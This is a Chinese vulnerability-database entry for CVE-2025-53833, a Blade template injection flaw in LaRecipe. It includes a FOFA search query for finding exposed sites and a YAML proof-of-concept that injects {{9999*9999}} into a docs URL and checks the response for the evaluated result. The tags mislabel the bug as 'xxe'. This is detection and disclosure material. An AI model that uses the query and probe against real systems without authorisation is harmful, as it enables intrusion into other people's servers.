CVE-2025-53833: LaRecipe 模板注入漏洞(CVE-2025-53833)

日期: 2025-09-01 | 影响软件: LaRecipe | POC: 已公开

漏洞描述

fofa: body="LaRecipe" && body="/larecipe/" || body="/docs/1.0/overview#section" 在于 LaRecipe 的文档渲染模块采用了不安全的动态模板编译方式。具体而言,当系统解析 Markdown 文档时,会直接通过 renderBlade()方法处理文档内容,而未对用户可控内容中的 Blade 模板指令(如 {{ }}、{!! !!})进行过滤或转义

PoC代码[已公开]

id: CVE-2025-53833

info:
  name: LaRecipe 模板注入漏洞(CVE-2025-53833)
  author: Superhero
  severity: high
  description: |-
    fofa: body="LaRecipe" && body="/larecipe/" || body="/docs/1.0/overview#section"
    在于 LaRecipe 的文档渲染模块采用了不安全的动态模板编译方式。具体而言,当系统解析 Markdown 文档时,会直接通过 renderBlade()方法处理文档内容,而未对用户可控内容中的 Blade 模板指令(如 {{ }}、{!! !!})进行过滤或转义
  reference:
    - https://mp.weixin.qq.com/s/48pDe8DLDJIqFgQztcczSw
  tags: cve,cve2025,larecipe,xxe
  created: 2025/07/30

rules:
  r0:
    request:
      method: GET
      path: /docs/1.0/?{{9999*9999}}
      headers:
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    expression: response.status == 200 && response.body.bcontains(b'99980001')
expression: r0()

相关漏洞推荐